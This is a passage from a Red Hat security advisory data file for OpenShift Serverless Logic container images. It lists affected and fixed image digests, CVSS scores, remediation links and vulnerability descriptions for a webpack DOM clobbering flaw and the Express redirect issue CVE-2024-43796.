"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", 